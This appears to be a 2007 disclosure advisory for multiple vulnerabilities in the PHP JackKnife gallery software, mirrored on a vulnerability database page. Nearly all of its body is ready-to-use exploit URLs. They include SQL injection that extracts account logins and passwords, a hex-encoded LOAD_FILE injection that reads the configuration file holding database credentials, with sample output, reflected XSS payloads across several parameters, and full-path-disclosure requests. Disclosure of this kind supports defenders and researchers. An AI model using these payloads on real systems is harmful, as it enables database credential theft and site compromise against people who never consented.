Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:17149
HistoryJun 01, 2007 - 12:00 a.m.

PHP JackKnife [multiple vulnerabilities]

2007-06-0100:00:00
vulners.com
19
JSON

Vendor site: http://www.phpjk.com/
Product: phpjackknife
Bug: sql injection , xss , full path
Risk: high
Note: works regarless of php.ini settings

Description:
PHP JackKnife (PHPJK) is freely downloadable PHP gallery software that you can use to instantly create you own online web gallery

Injection sql GET :

http://127.0.0.1/PHPJK/G_Display.php?iCategoryUnq=-1/**/union/**/select/**/1,2,Password,4,5,6/**/from/**/Accounts/*
http://127.0.0.1/PHPJK/Search/DisplayResults.php?DOMAIN_Link=&iSearchID=-1+UNION+SELECT+1,1,1,1,Login,1,Password,1,1,1,1,1,1,1+FROM+Accounts/*

Read database credentials:
http://127.0.0.1/PHPJK/G_Display.php?iCategoryUnq=-1/**/union/**/select/**/1,2,LOAD_FILE(0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F5048504A4B2F436F6E66696775726174696F6E732F5048504A4B5F436F6E6669672E706870),4,5,6/**/from/**/Accounts/*

//Result (in the page source code) :
$sUseDB = "MYSQL";
$sDatabaseName = "phpjk";
$sDatabaseServer = "localhost";
$sDatabaseLogin = "my_user";
$sDatabasePassword = "my_password";

ps:( 0x2F75… = /usr/local/apache2/htdocs/PHPJK/Configurations/PHPJK_Config.php )

Xss get :

http://127.0.0.1/PHPJK/G_Display.php?iCategoryUnq=</textarea>'"><script>alert(document.cookie)</script>
http://127.0.0.1/PHPJK/G_Display.php?iDBLoc=</textarea>'"><script>alert(document.cookie)</script>
http://127.0.0.1/PHPJK/G_Display.php?iTtlNumItems=</textarea>'"><script>alert(document.cookie)</script>
http://127.0.0.1/PHPJK/G_Display.php?&iNumPerPage=</textarea>'"><script>alert(document.cookie)</script>
http://127.0.0.1/PHPJK/G_Display.php?sSort=</textarea>'"><script>alert(document.cookie)</script>
http://127.0.0.1/PHPJK/UserArea/Authenticate.php?sUName=</textarea>'"><script>alert(document.cookie)</script>
http://127.0.0.1/PHPJK/UserArea/NewAccounts/index.php?sAccountUnq=</textarea>'"><script>alert(document.cookie)</script>

Full path :

http://127.0.0.1/PHPJK/G_Display.php?iCategoryUnq[]=1
http://127.0.0.1/PHPJK/G_Display.php?sSort[]=Name_A
http://127.0.0.1/PHPJK/index.php?iParentUnq[]=0

regards laurent gaffie
contact: [email protected]

JSON